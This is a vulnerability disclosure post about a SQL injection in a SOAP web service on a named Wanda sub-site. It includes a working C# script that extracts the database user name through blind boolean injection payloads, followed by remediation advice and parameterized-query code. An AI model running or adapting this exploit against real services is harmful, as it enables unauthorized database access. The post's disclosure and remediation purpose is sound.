A SQL injection vulnerability in a Wanda sub-site
Vulnerable site: mtodo.wanda.cn (no idea what this site is actually for ~~)
Vulnerable page: http://mtodo.wanda.cn/ServiceMobile.asmx?op=GetAllCount
Submitting an injected parameter directly in the request just returns a 302 redirect:
Since it is a web service, we can instead call it from code over the SOAP protocol. So I fired up VS and hacked something together ~~
Current User:
My messy code (a WinForms button handler; the `cn.wanda.mtodo.ServiceMobile` class is the proxy generated from the service's WSDL):

```csharp
using System;
using System.Text;
using System.Windows.Forms;

// SOAP proxy generated from the web reference
cn.wanda.mtodo.ServiceMobile sm = new cn.wanda.mtodo.ServiceMobile();

private void btnGetAllCount_Click(object sender, EventArgs e)
{
    try
    {
        string leix = this.txtUserid.Text; // SQL expression to read, e.g. the user or database name
        int str_len = 0;                   // length of the user or database name

        // Step 1: find the length; assume it is under 20 characters, which it normally is
        for (int j = 1; j < 20; j++)
        {
            // A normal response looks like {"success":true,"Rows":16,"message":""};
            // a response containing "1700" means the injected condition was true
            string rrr = sm.GetAllCount("' or 1=1 and " + j + "=len(" + leix + ")--");
            if (rrr.Contains("1700")) { str_len = j; }
        }
        this.txtMsg.Text = this.txtUserid.Text + " len:" + str_len + "\r\n";
        this.txtMsg.Text += leix + ":";

        if (str_len > 0)
        {
            // Step 2: recover the current user / database name one character at a time,
            // binary-searching the printable ASCII range 32..127
            int[] asc = new int[96];
            for (int i = 0; i < asc.Length; i++) asc[i] = 32 + i;

            for (int k = 1; k <= str_len; k++)
            {
                int low = 0;                // lowest candidate index
                int high = asc.Length - 1;  // highest candidate index
                while (low <= high)
                {
                    int mid = (low + high) / 2; // midpoint of the remaining range
                    string name = sm.GetAllCount("' or 1=1 and " + asc[mid] + "<=ascii(substring(" + leix + "," + k + ",1))--");
                    if (name.Contains("1700"))
                    {
                        low = mid + 1;
                        if (sm.GetAllCount("' or 1=1 and " + asc[mid] + "=ascii(substring(" + leix + "," + k + ",1))--").Contains("1700"))
                        {
                            this.txtMsg.Text += Encoding.ASCII.GetString(new byte[] { (byte)asc[mid] });
                        }
                    }
                    else
                    {
                        high = mid - 1;
                    }
                }
            }
        }
    }
    catch (Exception eq)
    {
        this.txtMsg.Text += eq.Message;
    }
}
```
Solution:
1. Use parameterized queries; do not build SQL statements by string concatenation.
2. Ideally deploy the web service so it can only be called from the intranet ~ do not expose it to the public internet.
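As an added illustration of point 1 (this is example code, not the site's real implementation), here is a `GetAllCount` web method written the concatenated way that allows the injection, beside the parameterized form that fixes it. The connection string, the `Todo` table and the `UserId` column are assumptions; only the response shape is taken from the report.

```csharp
using System.Data;
using System.Data.SqlClient;
using System.Web.Services;

public class ServiceMobile : WebService
{
    // Assumed connection string; the real one is not on the page
    private const string ConnStr = "Server=(local);Database=mtodo;Integrated Security=true";

    // Vulnerable form: the caller's string is spliced into the SQL text, so a value
    // such as   ' or 1=1 and 5=len(user)--   rewrites the WHERE clause and the row
    // count becomes an oracle for whether the injected condition held
    [WebMethod]
    public string GetAllCountVulnerable(string userId)
    {
        string sql = "select count(*) from Todo where UserId='" + userId + "'";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            int rows = (int)cmd.ExecuteScalar();
            return "{\"success\":true,\"Rows\":" + rows + ",\"message\":\"\"}";
        }
    }

    // Fixed form: the value is bound as a typed parameter, so SQL Server never
    // parses it as part of the statement; the same input is compared literally
    // against UserId and simply matches no rows
    [WebMethod]
    public string GetAllCount(string userId)
    {
        const string sql = "select count(*) from Todo where UserId=@userId";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@userId", SqlDbType.NVarChar, 50).Value = userId;
            conn.Open();
            int rows = (int)cmd.ExecuteScalar();
            return "{\"success\":true,\"Rows\":" + rows + ",\"message\":\"\"}";
        }
    }
}
```

Binding the parameter with an explicit type and length also stops over-long input reaching the query, which is worth keeping even once the service is restricted to the intranet (point 2).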